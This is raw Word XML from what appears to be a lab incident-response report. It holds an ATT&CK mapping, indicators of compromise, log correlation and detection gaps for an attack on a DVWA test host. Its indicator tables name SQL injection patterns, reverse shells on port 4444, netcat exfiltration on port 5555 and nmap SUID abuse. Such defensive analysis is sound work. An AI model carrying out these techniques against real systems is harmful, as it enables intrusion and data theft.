        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="072FF211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Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55663C15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T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="02586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E0E4D1A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Non-standard port (5555)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B095BF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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="026D75D1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Non-Standard Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C4D7398" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1571</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15BC6332" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77362904" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0639A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>The following IOCs were identified during the investigation. A SOC analyst discovering any of these in real network or system logs should treat them as strong evidence of an active or past compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A138B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Network IOCs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60F7B" w:rsidRPr="00F63671" w14:paraId="1590A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781C7410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IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="769D8F55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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="47745D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F3FC11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192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7319FFB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Attacker IP — source of all malicious traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="56A2D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323814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Bulk SYN packets from single source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F9E4AA7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Nmap port scan pattern — reconnaissance activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="635B2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3A16CA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HTTP requests with UNION+SELECT in URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C891E45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SQL injection payload in web traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5F72E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A705E1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Outbound TCP connection on port 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03D6B88E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Reverse shell — non-standard port, target initiating outbound connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="698F9F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178777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Outbound TCP connection on port 5555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B4B4FA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Data exfiltration — short-lived connection, immediate FIN after data transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="48B6B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D3CE72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PSH/ACK stream on port 4444 lasting 15+ minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A3B72A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Sustained shell session — attacker executing commands on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24D4A677" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web/Application IOCs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60F7B" w:rsidRPr="00F63671" w14:paraId="56EA2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0D02F7C1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IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="45E75665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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="1AD8E8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09DFE8D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UNION+SELECT in HTTP GET parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="783B6D31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SQL injection attempt visible in web logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="7837C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E55141D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%27 (%27 = URL-encoded single quote) in URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F16836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SQL injection quote character in request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="01A0DC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F7330FE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Nmap scripting engine user agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="512B351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Automated scanner probing web server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="15BAF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32860A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PROPFIND / OPTIONS requests from external IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F10E201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Nmap NSE web scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41C5CE38" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>System IOCs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60F7B" w14:paraId="5B9B0B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5C8516FE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="78CFEBEE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="72E5C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6194D24" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> or bash process spawned by www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B14660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Shell escape from web server process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="49EE2A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4ACC85B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> --interactive executed by www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="238F4246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SUID abuse attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="09601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E55878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Outbound nc (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>) connection from www-data/root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="097FDD7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 xml:space="preserve">Reverse shell or exfiltration via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="2526B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8550A1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Files written to /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> by web server user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26730229" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Attacker staging area on target filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="597896BE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BE925" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. Log Correlation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BD60E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The attack was confirmed across three independent evidence sources. Each source corroborates the others, providing high-confidence reconstruction of the full attack chain.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3"/>
        <w:gridCol w:w="3136"/>
        <w:gridCol w:w="4181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w14:paraId="4F352798" w14:textId="77777777" w:rsidTr="00F63671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2613" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="76FFB7F8" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Evidence Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3136" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4B41909E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Attack Stage Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="2D55CA0D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Key Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="620D04F1" w14:textId="77777777" w:rsidTr="00F63671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2613" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="453CC803" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>lab_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>capture.pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D1F41B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>All stages — Recon through Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8E818E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SYN scan packets, HTTP UNION payloads, port 4444 shell session, port 5555 file transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="641711C9" w14:textId="77777777" w:rsidTr="00F63671">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="643"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2613" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28838205" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>access.log.1 (web server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581FC5F1" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Reconnaissance + SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55F99D5E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nmap scripting engine requests at 18:52:53, DVWA access from 192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="7D59D762" w14:textId="77777777" w:rsidTr="00F63671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2613" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641248C6" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>auth.log (system)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7EBE54" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Post-exploitation access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155873A9" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH session opened for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>msfadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> from 192.168.100.10 at 07:51:19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AA8C542" w14:textId="3641921C" w:rsidR="00260F7B" w:rsidRDefault="00260F7B"/>
    <w:p w14:paraId="669A364A" w14:textId="77777777" w:rsidR="00F63671" w:rsidRDefault="00F63671">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A0B30B" w14:textId="77777777" w:rsidR="00F63671" w:rsidRDefault="00F63671">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A45C27" w14:textId="452196BD" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>8. Detection Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377022A7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The following security controls were absent or ineffective, each representing a missed opportunity to detect or stop the attack:</w:t>
      </w:r>
    </w:p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6319"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w14:paraId="22F0CE36" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="63EE3C61" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="458F3BAA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>What should have happened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="2C382005" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B23C536" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No IDS/IPS rule for Nmap scan patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7651690D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Bulk SYN packets from a single source should trigger a port scan alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="2CC61B05" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="003122E2" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No WAF (Web Application Firewall)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7813DB04" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>UNION SELECT in HTTP parameters should have been blocked before reaching the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="331C16E1" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47076CB4" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No SQL parameterization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E1FFB9" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Prepared statements would have made SQL injection impossible at the code level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="2347CDC8" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57A671D5" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No alert on non-standard outbound ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2769DCC9" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Port 4444 and 5555 outbound connections should have triggered immediate alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
